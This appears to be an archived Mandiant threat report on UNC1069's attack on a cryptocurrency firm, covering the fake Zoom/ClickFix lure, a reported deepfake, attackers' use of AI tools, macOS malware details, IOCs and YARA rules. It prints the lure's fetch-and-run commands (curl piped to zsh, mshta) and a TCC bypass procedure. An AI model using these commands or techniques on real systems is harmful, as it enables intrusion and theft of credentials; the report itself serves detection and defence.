{
	"id": "38fe2400-2254-4e1b-ba26-b33cb8ba1284",
	"created_at": "2026-04-06T00:10:08.598406Z",
	"updated_at": "2026-04-10T13:12:12.648181Z",
	"deleted_at": null,
	"sha1_hash": "a052ffc6a85eecd3f0a1b632c5fb52bcee845eed",
	"title": "UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1075694,
	"plain_text": "UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering\r\nBy Mandiant\r\nPublished: 2026-02-09 · Archived: 2026-04-05 15:28:44 UTC\r\nWritten by: Ross Inman, Adrian Hernandez\r\nIntroduction\r\nNorth Korean threat actors continue to evolve their tradecraft to target the cryptocurrency and decentralized finance (DeFi)\r\nverticals. Mandiant recently investigated an intrusion targeting a FinTech entity within this sector, attributed to UNC1069, a\r\nfinancially motivated threat actor active since at least 2018. This investigation revealed a tailored intrusion resulting in the\r\ndeployment of seven unique malware families, including a new set of tooling designed to capture host and victim data:\r\nSILENCELIFT, DEEPBREATH and CHROMEPUSH. The intrusion relied on a social engineering scheme involving a\r\ncompromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated\r\nvideo to deceive the victim.\r\nThese tactics build upon a shift first documented in the November 2025 publication GTIG AI Threat Tracker: Advances in\r\nThreat Actor Usage of AI Tools where Google Threat Intelligence Group (GTIG) identified UNC1069's transition from\r\nusing AI for simple productivity gains to deploying novel AI-enabled lures in active operations. The volume of tooling\r\ndeployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to\r\nfacilitate financial theft. While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital\r\nfirms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a\r\nsignificant expansion in their capabilities.\r\nInitial Vector and Social Engineering \r\nThe victim was contacted via Telegram through the account of an executive of a cryptocurrency company that had been\r\ncompromised by UNC1069. 
Mandiant identified claims from the true owner of the account, posted from another social\r\nmedia profile, where they had posted a warning to their contacts that their Telegram account had been hijacked; however,\r\nMandiant was not able to verify or establish contact with this executive. UNC1069 engaged the victim and, after building a\r\nrapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting\r\nthat was hosted on the threat actor's infrastructure, zoom[.]uswe05[.]us . \r\nThe victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company\r\nthat appeared to be a deepfake. While Mandiant was unable to recover forensic evidence to independently verify the use of\r\nAI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar\r\ncharacteristics, where deepfakes were also allegedly used.\r\nOnce in the \"meeting,\" the fake video call facilitated a ruse that gave the impression to the end user that they were\r\nexperiencing audio issues. This was employed by the threat actor to conduct a ClickFix attack: an attack technique where the\r\nthreat actor directs the user to run troubleshooting commands on their system to address a purported technical issue. The\r\nrecovered web page provided two sets of commands to be run for \"troubleshooting\": one for macOS systems, and one for\r\nWindows systems. Embedded within the string of commands was a single command that initiated the infection chain. \r\nMandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the\r\ncryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees\r\nor executives. 
This includes the use of fake Zoom meetings and a known use of AI tools by the threat actor for editing\r\nimages or videos during the social engineering stage. \r\nUNC1069 is known to use tools like Gemini to develop tooling, conduct operational research, and assist during the\r\nreconnaissance stages, as reported by GTIG. Additionally, Kaspersky recently claimed Bluenoroff, a threat actor that\r\noverlaps with UNC1069, is also using GPT-4o models to modify images, indicating adoption of GenAI tools and integration\r\nof AI into the adversary lifecycle.\r\nInfection Chain \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 1 of 16\n\nIn the incident response engagement performed by Mandiant, the victim executed the \"troubleshooting\" commands provided\r\nin Figure 1, which led to the initial infection of the macOS device.\r\nsystem_profiler SPAudioData\r\nsoftwareupdate --evaluate-products --products audio --agree-to-license\r\ncurl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh\r\nsystem_profiler SPSoundCardData\r\nsoftwareupdate --evaluate-products --products soundcard\r\nsystem_profiler SPSpeechData\r\nsoftwareupdate --evaluate-products --products speech --agree-to-license\r\nFigure 1: Attacker commands shared during the social engineering stage\r\nA set of \"troubleshooting\" commands that targeted Windows operating systems was also recovered from the fake Zoom call\r\nwebpage:\r\nsetx audio_volume 100\r\npnputil /enum-devices /connected /class \"Audio\"\r\nmshta hxxp://mylingocoin[.]com/audio/fix/6454694440\r\nwmic sounddev get Caption, ProductName, DeviceID, Status\r\nmsdt -id AudioPlaybackDiagnostic\r\nexit\r\nFigure 2: Attacker commands shared when Windows is detected\r\nEvidence of AppleScript execution was recorded immediately following the start of the infection chain; however, contents of\r\nthe AppleScript payload could not be recovered from the resident forensic\r\n
artifacts on the system. Following the AppleScript\r\nexecution a malicious Mach-O binary was deployed to the system. \r\nThe first malicious executable file deployed to the system was a packed backdoor tracked by Mandiant as WAVESHAPER.\r\nWAVESHAPER served as a conduit to deploy a downloader tracked by Mandiant as HYPERCALL as well as subsequent\r\nadditional tooling to considerably expand the adversary's foothold on the system. \r\nMandiant observed three uses of the HYPERCALL downloader during the intrusion: \r\n1. Execute a follow-on backdoor component, tracked by Mandiant as HIDDENCALL, which provided hands-on\r\nkeyboard access to the compromised system\r\n2. Deploy another downloader, tracked by Mandiant as SUGARLOADER\r\n3. Facilitate the execution of a toehold backdoor, tracked by Mandiant as SILENCELIFT, which beacons system\r\ninformation to a command-and-control (C2 or C\u0026C) server\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 2 of 16\n\nXProtect \r\nXProtect is the built-in anti-virus technology included in macOS. Originally relying on signature-based detection only, the\r\nXProtect Behavioral Service (XBS) was introduced to implement behavioral-based detection. If a program violates one of\r\nthe behavioral-based rules, which are defined by Apple, information about the offending program is recorded in the XProtect\r\nDatabase (XPdb), an SQLite 3 database located at /var/protected/xprotect/XPdb .\r\nUnlike signature-based detections, behavioral-based detections do not result in XProtect blocking execution or quarantining\r\nof the offending program. \r\nMandiant recovered the file paths and SHA256 hashes of programs that had violated one or more of the XBS rules from the\r\nXPdb. This included information on malicious programs that had been deleted and could not be recovered. 
As the XPdb also\r\nincludes a timestamp of the detection, Mandiant could determine the sequence of events associated with malware execution,\r\nfrom the initial infection chain to the next-stage malware deployments, despite no endpoint detection and response (EDR)\r\nproduct being present on the compromised system. \r\nData Harvesting and Persistence\r\nMandiant identified two disparate data miners that were deployed by the threat actor during their access period:\r\nDEEPBREATH and CHROMEPUSH. \r\nDEEPBREATH, a data miner written in Swift, was deployed via HIDDENCALL—the follow-on backdoor component to\r\nHYPERCALL. DEEPBREATH manipulates the Transparency, Consent, and Control (TCC) database to gain broad file\r\nsystem access, enabling it to steal:\r\n1. Credentials from the user's Keychain\r\n2. Browser data from Chrome, Brave, and Edge\r\n3. User data from two different versions of Telegram\r\n4. User data from Apple Notes\r\nDEEPBREATH stages the targeted data in a temporary folder location and compresses the data into a ZIP archive, which\r\nwas exfiltrated to a remote server via the curl command-line utility. \r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 3 of 16\n\nMandiant also identified HYPERCALL deployed an additional malware loader, tracked as part of the code family\nSUGARLOADER. A persistence mechanism was installed in the form of a launch daemon for SUGARLOADER, which\nconfigured the system to execute the malware during the macOS startup process. The launch daemon was configured\nthrough a property list (Plist) file, /Library/LaunchDaemons/com.apple.system.updater.plist . 
The contents of the launch\ndaemon Plist file are provided in Figure 4.\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\nLabel: com.apple.system.updater\nProgramArguments: /Library/OSRecovery/SystemUpdater\nRunAtLoad\nKeepAlive\nExitTimeOut: 10\nFigure 4: Launch daemon Plist configured to execute SUGARLOADER\nThe SUGARLOADER sample recovered during the investigation did not have any internal functionality for establishing\npersistence; therefore, Mandiant assesses the launch daemon was created manually via access granted by one of the other\nmalicious programs.\nMandiant observed SUGARLOADER was solely used to deploy CHROMEPUSH, a data miner written in C++.\nCHROMEPUSH deployed a browser extension to Google Chrome and Brave browsers that masqueraded as an extension\npurposed for editing Google Docs offline. CHROMEPUSH additionally possessed the capability to record keystrokes,\nobserve username and password inputs, and extract browser cookies, completing the data harvesting on the host.\nIn the Spotlight: UNC1069\nUNC1069 is a financially motivated threat actor that is suspected with high confidence to have a North Korea nexus and that\nhas been tracked by Mandiant since 2018. Mandiant has observed this threat actor evolve its tactics, techniques, and\nprocedures (TTPs), tooling, and targeting. Since at least 2023, the group has shifted from spear-phishing techniques and\ntraditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers\nat financial institutions, high-technology companies, and individuals at venture capital funds.\n
Notably, while UNC1069 has\nhad a smaller impact on cryptocurrency heists compared to other groups like UNC4899 in 2025, it remains an active threat\ntargeting centralized exchanges and both entities and individuals for financial gain.\nFigure 5: UNC1069 victimology map\r\nMandiant has observed this group active in 2025 targeting the financial services and the cryptocurrency industry in\r\npayments, brokerage, staking, and wallet infrastructure verticals. \r\nWhile UNC1069 operators have targeted both individuals in the Web3 space and corporate networks in these verticals,\r\nUNC1069 and other suspected Democratic People's Republic of Korea (DPRK)-nexus groups have demonstrated the\r\ncapability to move from personal to corporate devices using different techniques in the past. However, for this particular\r\nincident, Mandiant noted an unusually large amount of tooling dropped onto a single host targeting a single individual. This\r\nevidence confirms this incident was a targeted attack to harvest as much data as possible for a dual purpose: enabling\r\ncryptocurrency theft and fueling future social engineering campaigns by leveraging the victim’s identity and data.\r\nSubsequently, Mandiant identified seven distinct malware families during the forensic analysis of the compromised system,\r\nwith SUGARLOADER being the only malware family already tracked by Mandiant prior to the investigation.\r\nTechnical Appendix\r\nWAVESHAPER\r\nWAVESHAPER is a backdoor written in C++ and packed by an unknown packer that targets macOS. The backdoor supports\r\ndownloading and executing arbitrary payloads retrieved from its command-and-control (C2 or C\u0026C) server, which is\r\nprovided via the command-line parameters.\r\n
To communicate with the adversary infrastructure, WAVESHAPER leverages\r\nthe curl library for either HTTP or HTTPS, depending on the command-line argument provided.\r\nWAVESHAPER also runs as a daemon by forking itself into a child process that runs in the background detached from the\r\nparent session and collects the following system information, which is sent to the C\u0026C server in a HTTP POST request:\r\nRandom victim UID (16 alphanumeric chars)\r\nVictim username\r\nVictim machine name\r\nSystem time zone\r\nSystem boot time using sysctlbyname(\"kern.boottime\")\r\nRecently installed software\r\nHardware model\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 5 of 16\n\nCPU information\r\nOS version\r\nList of the running processes\r\nPayloads downloaded from the C\u0026C server are saved to a file system location matching the following regular expression\r\npattern: /tmp/\\.[A-Za-z0-9]{6} .\r\nHYPERCALL\r\nHYPERCALL is a Go-based downloader designed for macOS that retrieves malicious dynamic libraries from a designated\r\nC\u0026C server. The C\u0026C address is extracted from an RC4-encrypted configuration file that must be present on the disk\r\nalongside the binary. Once downloaded, the library is reflectively loaded for in-memory execution.\r\nMandiant observed recognizable influences from SUGARLOADER in HYPERCALL, despite the new downloader being\r\nwritten in a different language (Golang instead of C++) and having a different development process. These similarities\r\ninclude the use of an external configuration file for the C\u0026C infrastructure, the use of the RC4 algorithm for configuration\r\nfile decryption, and the capability for reflective library injection.\r\nNotably, some elements in HYPERCALL appear to be incomplete. 
For instance, the presence of configuration parameters\r\nthat are of no use reveals a lack of technical proficiency by some of UNC1069's malware developers compared to other\r\nNorth Korea-nexus threat actors.\r\nHYPERCALL accepts a single command-line argument to which it expects a C\u0026C host to connect. This command is then\r\nsaved to the configuration file located at /Library/SystemSettings/.CacheLogs.db . HYPERCALL also leverages a hard-coded 16-byte RC4 key to decrypt the data stored within the configuration file, a pattern observed within other UNC1069\r\nmalware families. \r\nThe HYPERCALL configuration instructed the downloader to communicate with the following C\u0026C servers on TCP port\r\n443:\r\nwss://supportzm[.]com\r\nwss://zmsupport[.]com\r\nOnce connected, the HYPERCALL registers with the C\u0026C using the following message expecting a response message of 1:\r\n{\r\n \"type\": \"loader\",\r\n \"client_id\": \u003cclient_id\u003e\r\n}\r\nFigure 6: Registration message sent to the C\u0026C server\r\nOnce the HYPERCALL has registered with the C\u0026C server, it sends a dynamic library download request:\r\n{\r\n \"type\": \"get_binary\",\r\n \"system\": \"darwin\"\r\n}\r\nFigure 7: Dynamic library download request message sent to the C\u0026C server\r\nThe C\u0026C server responds to the request with information on the dynamic library to download, followed by the dynamic\r\nlibrary content:\r\n{\r\n \"type\": \u003cunknown\u003e,\r\n \"total_size\": \u003ctotal_size\u003e\r\n}\r\nFigure 8: Dynamic library download response message received by the C\u0026C server\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 6 of 16\n\nThe C\u0026C server informs the HYPERCALL client all of the dynamic library content has been sent via the following\r\nmessage:\r\n{\r\n \"type\": \"end_chunks\"\r\n}\r\nFigure 9: Message sent by the C\u0026C server to mark the end of the dynamic library 
content\r\nAfter receiving the dynamic library, HYPERCALL sends a final acknowledgement message:\r\n{\r\n \"type\": \"down_ok\"\r\n}\r\nFigure 10: Final acknowledgement message sent by HYPERCALL to the C\u0026C server\r\nHYPERCALL then waits for three seconds before executing the downloaded dynamic library in-memory using reflective\r\nloading.\r\nHIDDENCALL\r\nWe assess with high confidence that UNC1069 utilizes the HYPERCALL downloader and HIDDENCALL backdoor as\r\ncomponents of a single, synchronized attack lifecycle. \r\nThis assessment is supported by forensic observations of HYPERCALL downloading and reflectively injecting\r\nHIDDENCALL into system memory. Furthermore, technical examination revealed significant code overlaps between the\r\nHYPERCALL Golang binary and HIDDENCALL's Ahead-of-Time (AOT) translation files. Both families utilize identical\r\nlibraries and follow a distinct \" t_ \" naming convention for functions (such as t_loader and t_ ), strongly suggesting a\r\nunified development environment and shared tradecraft. The use of this custom, integrated tooling suite highlights\r\nUNC1069's technical proficiency in developing specialized capabilities to bypass security measures and secure long-term\r\npersistence in target networks.\r\nRosetta Cache Analysis\r\nMandiant has previously documented how files from the Rosetta cache can be used to prove program execution, as well as\r\nhow malware identification can be possible through analysis of the symbols present in the AOT translation files.\r\nHYPERCALL leveraged the NSCreateObjectFileImageFromMemory API call to reflectively load a follow-on backdoor\r\ncomponent from memory. When NSCreateObjectFileImageFromMemory is called, the executable file that is to be loaded\r\nfrom memory is temporarily written to disk under the /tmp/ folder, with the filename matching the regular expression\r\npattern NSCreateObjectFileImageFromMemory-[A-Za-z0-9]{8} . 
\r\nThis intrinsic behaviour, combined with the HIDDENCALL payload being compiled for x86_64 architecture, resulted in the\r\ncreation of a Rosetta cache AOT file for the reflectively loaded Mach-O executable. Through analysis of the Rosetta cache\r\nfile, Mandiant was able to assess with high confidence that the reflectively loaded Mach-O executable was the follow-on\r\nbackdoor component, also written in Golang, that Mandiant tracks as HIDDENCALL. \r\nListed in Figure 11 through Figure 14 are the symbols and project file paths identified from the AOT file associated with\r\nHIDDENCALL execution, as well as the HYPERCALL sample analysed by Mandiant, which were used to assess the\r\nfunctionality of HIDDENCALL.\r\n_t/common.rc4_encode\r\n_t/common.resolve_server\r\n_t/common.load_config\r\n_t/common.save_config\r\n_t/common.generate_uid\r\n_t/common.send_data\r\n_t/common.send_error_message\r\n_t/common.get_local_ip\r\n_t/common.get_info\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 7 of 
16\n\n_t/common.rsp_get_info\r\n_t/common.override_env\r\n_t/common.exec_command_with_timeout\r\n_t/common.exec_command_with_timeout.func1\r\n_t/common.rsp_exec_cmd\r\n_t/common.send_file\r\n_t/common.send_file.deferwrap1\r\n_t/common.add_file_to_zip\r\n_t/common.add_file_to_zip.deferwrap1\r\n_t/common.zip_file\r\n_t/common.zip_file.func1\r\n_t/common.zip_file.deferwrap2\r\n_t/common.zip_file.deferwrap1\r\n_t/common.rsp_zdn\r\n_t/common.rsp_dn\r\n_t/common.receive_file\r\n_t/common.receive_file.deferwrap1\r\n_t/common.unzipFile\r\n_t/common.unzipFile.deferwrap1\r\n_t/common.rsp_up\r\n_t/common.rsp_inject_explorer\r\n_t/common.rsp_inject\r\n_t/common.wipe_file\r\n_t/common.rsp_wipe_file\r\n_t/common.send_cmd_result\r\n_t/common.rsp_new_shell\r\n_t/common.rsp_exit_shell\r\n_t/common.rsp_enter_shell\r\n_t/common.rsp_leave_shell\r\n_t/common.rsp_run\r\n_t/common.rsp_runx\r\n_t/common.rsp_test_conn\r\n_t/common.rsp_check_event\r\n_t/common.rsp_sleep\r\n_t/common.rsp_pv\r\n_t/common.rsp_pcmd\r\n_t/common.rsp_pkill\r\n_t/common.rsp_dir\r\n_t/common.rsp_state\r\n_t/common.rsp_get_cfg\r\n_t/common.rsp_set_cfg\r\n_t/common.rsp_chdir\r\n_t/common.get_file_property\r\n_t/common.get_file_property.func1\r\n_t/common.rsp_file_property\r\n_t/common.do_work\r\n_t/common.do_work.deferwrap1\r\n_t/common.Start\r\n_t/common.init_env\r\n_t/common.get_config_path\r\n_t/common.get_startup_path\r\n_t/common.get_launch_plist_path\r\n_t/common.get_os_info\r\n_t/common.get_process_uid\r\n_t/common.get_file_info\r\n_t/common.get_dir_entries\r\n_t/common.is_locked\r\n_t/common.check_event\r\n_t/common.change_dir\r\n_t/common.run_command_line\r\n_t/common.run_command_line.func1\r\n_t/common.copy_file\r\n_t/common.copy_file.deferwrap2\r\n_t/common.copy_file.deferwrap1\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 8 of 
16\n\n_t/common.setup_startup\r\n_t/common.file_exist\r\n_t/common.session_work\r\n_t/common.exit_shell\r\n_t/common.restart_shell\r\n_t/common.start_shell_reader\r\n_t/common.watch_shell_output_loop\r\n_t/common.watch_shell_output_loop.func1\r\n_t/common.watch_shell_output_loop.func1.deferwrap1\r\n_t/common.exec_with_shell\r\n_t/common.start_shell_reader.func1\r\n_t/common.do_work.jump513\r\n_t/common.g_shoud_fork\r\n_t/common.CONFIG_CRYPT_KEY\r\n_t/common.g_conn\r\n_t/common.g_shell_cmd\r\n_t/common.g_shell_pty\r\n_t/common.stop_reader_chan\r\n_t/common.stop_watcher_chan\r\n_t/common.g_config_file_path\r\n_t/common.g_output_buffer\r\n_t/common.g_cfg\r\n_t/common.g_use_shell\r\n_t/common.g_working\r\n_t/common.g_out_changed\r\n_t/common.g_reason\r\n_t/common.g_outputMutex\r\nFigure 11: Notable Golang symbols from the HIDDENCALL AOT file analyzed by Mandiant\r\nt_loader/common\r\nt_loader/inject_mac\r\nt_loader/inject_mac._Cfunc_InjectDylibFromMemory\r\nt_loader/inject_mac.Inject\r\nt_loader/inject_mac.Inject.func1\r\nt_loader/common.rc4_encode\r\nt_loader/common.generate_uid\r\nt_loader/common.load_config\r\nt_loader/common.rc4_decode\r\nt_loader/common.save_config\r\nt_loader/common.resolve_server\r\nt_loader/common.receive_file\r\nt_loader/common.Start\r\nt_loader/common.check_server_urls\r\nt_loader/common.inject_pe\r\nt_loader/common.init_env\r\nt_loader/common.get_config_path\r\nFigure 12: Notable Golang symbols from the HYPERCALL AOT file analyzed by 
Mandiant\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000000.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000004.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000005.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000006.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000007.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000008.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000009.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000010.o)\r\n/Users/mac/Documents/go_t/t/../build/mac/t.a(000011.o)\r\nFigure 13: Project file paths from the HIDDENCALL AOT file analyzed by Mandiant\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 9 of 16\n\n/Users/mac/Documents/go_t/t_loader/inject_mac/inject.go\r\n/Users/mac/Documents/go_t/t_loader/common/common.go\r\n/Users/mac/Documents/go_t/t_loader/common/common_unix.go\r\n/Users/mac/Documents/go_t/t_loader/exe.go\r\nFigure 14: Project file paths from the HYPERCALL AOT file analyzed by Mandiant\r\nDEEPBREATH\r\nA new piece of macOS malware identified during the intrusion was DEEPBREATH, a sophisticated data miner designed to\r\nbypass a key component of macOS privacy: the Transparency, Consent, and Control (TCC) database. \r\nWritten in Swift, DEEPBREATH's primary purpose is to gain access to files and sensitive personal information.\r\nTCC Bypass\r\nInstead of prompting the user for elevated permissions, DEEPBREATH directly manipulates the user's TCC database\r\n( TCC.db ). It executes a series of steps to circumvent protections that prevent direct modification of the live database:\r\n1. Staging: It leverages the Finder application to rename the user's TCC folder and copies the TCC.db file to a\r\ntemporary staging location, which allows it to modify the database unchallenged. \r\n2. 
Permission Injection: Once staged, the malware programmatically inserts permissions, effectively granting itself\r\nbroad access to critical user folders like Desktop, Documents, and Downloads.\r\n3. Restoration: Finally, it restores the modified database back to its original location, giving DEEPBREATH the broad\r\nfile system access it needs to operate.\r\nIt should be noted that this technique is possible due to the Finder application possessing Full Disk Access (FDA)\r\npermissions, which are the permissions necessary to modify the user-specific TCC database in macOS. \r\nTo ensure its operation remains uninterrupted, the malware uses an AppleScript to re-launch itself in the background using\r\nthe -autodata argument, detaching from the initial process to continue data collection silently throughout the user's\r\nsession.\r\nWith elevated access, DEEPBREATH systematically targets high-value data:\r\nCredentials: Steals login credentials from the user keychain ( login.keychain-db )\r\nBrowser Data: Copies cookies, login data, and local extension settings from major browsers including Google\r\nChrome, Brave, and Microsoft Edge across all user profiles\r\nMessaging and Notes: Exfiltrates user data from two different versions of Telegram and also targets and copies\r\ndatabase files from Apple Notes\r\nDEEPBREATH is a prime example of an attack vector focused on bypassing core operating system security features to\r\nconduct widespread data theft.\r\nSUGARLOADER\r\nSUGARLOADER is a downloader written in C++ historically associated with UNC1069 intrusions.\r\nBased on the observations from this intrusion, SUGARLOADER was solely used to deploy CHROMEPUSH. If\r\nSUGARLOADER is run without any command arguments, the binary checks for an existing configuration file located on\r\nthe victim's computer at /Library/OSRecovery/com.apple.os.config . \r\nThe configuration is encrypted using RC4, with a hard-coded 32-byte key found in the binary. 
\r\nOnce decrypted, the configuration data contains up to two URLs that point to the next stage. The URLs are queried to\r\ndownload the next stage of the infection; if the first URL responds with a suitable executable payload, then the second URL\r\nis not queried. \r\nThe decrypted SUGARLOADER configuration for the sample analysed by Mandiant included the following C\u0026C servers:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\r\nPage 10 of 16\n\nbreakdream[.]com:443\ndreamdie[.]com:443\nCHROMEPUSH\nDuring this intrusion, a second dataminer was recovered and named CHROMEPUSH. This data miner is written in C++ and\ninstalls itself as a browser extension targeting Chromium-based browsers, such as Google Chrome and Brave, to collect\nkeystrokes, username and password inputs, and browser cookies, which it uploads to a web server.\nCHROMEPUSH establishes persistence by installing itself as a native messaging host for Chromium-based browsers. 
For\nGoogle Chrome, CHROMEPUSH copies itself to %HOME%/Library/Application\nSupport/Google/Chrome/NativeMessagingHosts/Google Chrome Docs and creates a corresponding manifest file,\ncom.google.docs.offline.json, in the same directory.\n{\n \"name\": \"com.google.docs.offline\",\n \"description\": \"Native messaging for Google Docs Offline extension\",\n \"path\": \"%HOME%/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs\",\n \"type\": \"stdio\",\n \"allowed_origins\": [ \"chrome-extension://hennhnddfkgohngcngmflkmejacokfik/\" ]\n}\nFigure 15: Manifest file for Google Chrome native messaging host established by the data miner\nBy installing itself as a native messaging host, CHROMEPUSH will be automatically executed when the corresponding\nbrowser is launched.\nOnce executed via the native messaging host mechanism, the data miner creates a base data directory at\n%HOME%/Library/Application Support/com.apple.os.receipts and performs browser identification. A subdirectory within\nthe base data directory is created with the corresponding identifier, which is based on the detected browser:\nGoogle Chrome leads to the subdirectory being named \"c\".\nBrave Browser leads to the subdirectory being named \"b\".\nArc leads to the subdirectory being named \"a\".\nMicrosoft Edge leads to the subdirectory being named \"e\".\nIf none of these match, the subdirectory name is set to \"u\".\nCHROMEPUSH reads configuration data from the file location %HOME%/Library/Application\nSupport/com.apple.os.receipts/setting.db. The configuration settings are parsed in JavaScript Object Notation\n(JSON) format.\n
The names of the used JSON variables indicate their potential usage:\ncap_on : Assumed to control whether screen captures should be taken\ncap_time : Assumed to control the interval of screen captures\ncoo_on : Assumed to control whether cookies should be accessed\ncoo_time : Assumed to control the interval of accessing the cookie data\nkey_on : Assumed to control whether keypresses should be logged\nC\u0026C URL\nCHROMEPUSH stages collected data in temporary files within the %HOME%/Library/Application\nSupport/com.apple.os.receipts// directory.\nThese files are then renamed using the following formats:\nScreenshots: CAYYMMDDhhmmss.dat\nKeylogging: KLYYMMDDhhmmss.dat\nhttps://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering\nPage 11 of 16\n\nCookies: CK_.dat\nCHROMEPUSH stages and sends the collected data in HTTP POST requests to its C\u0026C server. In the sample analysed by\nMandiant, the C\u0026C server was identified as hxxp://cmailer[.]pro:80/upload .\nSILENCELIFT\nSILENCELIFT is a minimalistic backdoor written in C/C++ that beacons host information to a hard-coded C\u0026C server. The\nC\u0026C server identified in this sample was identified as support-zoom[.]us .\nSILENCELIFT retrieves a unique ID from the hard-coded file path /Library/Caches/.Logs.db. Notably, this is the exact same\npath used by the CHROMEPUSH. 
The backdoor also collects the lock-screen status, which is sent to the C\u0026C server together with the unique ID.\r\nIf executed with root privileges, SILENCELIFT can actively interrupt Telegram communications while beaconing to its C\u0026C server.\r\nIndicators of Compromise\r\nTo assist the wider community in hunting for and identifying the activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.\r\nNetwork-Based Indicators\r\nIndicator | Description\r\nmylingocoin.com | Hosted the payload that was retrieved and executed to commence the initial infection\r\nzoom.uswe05.us | Hosted the fake Zoom meeting\r\nbreakdream.com | SUGARLOADER C\u0026C\r\ndreamdie.com | SUGARLOADER C\u0026C\r\nsupport-zoom.us | SILENCELIFT C\u0026C\r\nsupportzm.com | HYPERCALL C\u0026C\r\nzmsupport.com | HYPERCALL C\u0026C\r\ncmailer.pro | CHROMEPUSH upload server\r\nHost-Based Indicators\r\nDescription | SHA-256 Hash | File Name\r\nDEEPBREATH | b452c2da7c012eda25a1403b3313444b5eb7c2c3e25eee489f1bd256f8434735 | /Library/Caches/System Settings\r\nSUGARLOADER | 1a30d6cdb0b98feed62563be8050db55ae0156ed437701d36a7b46aabf086ede | /Library/OSRecovery/SystemUpdater\r\nWAVESHAPER | b525837273dde06b86b5f93f9aec2c29665324105b0b66f6df81884754f8080d | /Library/Caches/com.apple.mond\r\nHYPERCALL | c8f7608d4e19f6cb03680941bbd09fe969668bcb09c7ca985048a22e014dffcd | /Library/SystemSettings/com.apple.sys\r\nCHROMEPUSH | 603848f37ab932dccef98ee27e3c5af9221d3b6ccfe457ccf93cb572495ac325 | /Users/\u003cuser\u003e/Library/Application Support/Google/Chrome/NativeMessagingH\r\n    Browser Docs\r\n    /Users/\u003cuser\u003e/Library/Application Support/Google/Chrome/NativeMessagingH\r\n    Chrome Docs\r\n    /Library/Caches/chromeext\r\nSILENCELIFT | c3e5d878a30a6c46e22d1dd2089b32086c91f13f8b9c413aa84e1dbaa03b9375 | /Library/Fonts/com.apple.logd\r\nHYPERCALL configuration (executes itself with sudo) | 03f00a143b8929585c122d490b6a3895d639c17d92c2223917e3a9ca1b8d30f9 | /Library/SystemSettings/.CacheLogs.db\r\nYARA Rules\r\nrule G_Backdoor_WAVESHAPER_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        date_created = \"2025-11-03\"\r\n        date_modified = \"2025-11-03\"\r\n        md5 = \"c91725905b273e81e9cc6983a11c8d60\"\r\n        rev = 1\r\n    strings:\r\n        $str1 = \"mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)\"\r\n        $str2 = \"/tmp/.%s\"\r\n        $str3 = \"grep \\\"Install Succeeded\\\" /var/log/install.log | awk '{print $1, $2}'\"\r\n        $str4 = \"sysctl -n hw.model\"\r\n        $str5 = \"sysctl -n machdep.cpu.brand_string\"\r\n        $str6 = \"sw_vers --ProductVersion\"\r\n    condition:\r\n        all of them\r\n}\r\nrule G_Backdoor_WAVESHAPER_2 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        date_created = \"2025-11-03\"\r\n        date_modified = \"2025-11-03\"\r\n        md5 = \"eb7635f4836c9e0aa4c315b18b051cb5\"\r\n        rev = 1\r\n    strings:\r\n        $str1 = \"__Z10RunCommand\"\r\n        $str2 = \"__Z11GenerateUID\"\r\n        $str3 = \"__Z11GetResponse\"\r\n        $str4 = \"__Z13WriteCallback\"\r\n        $str5 = \"__Z14ProcessRequest\"\r\n        $str6 = \"__Z14SaveAndExecute\"\r\n        $str7 = \"__Z16MakeStatusString\"\r\n        $str8 = \"__Z24GetCurrentExecutablePath\"\r\n        $str9 = \"__Z7Execute\"\r\n    condition:\r\n        all of them\r\n}\r\n
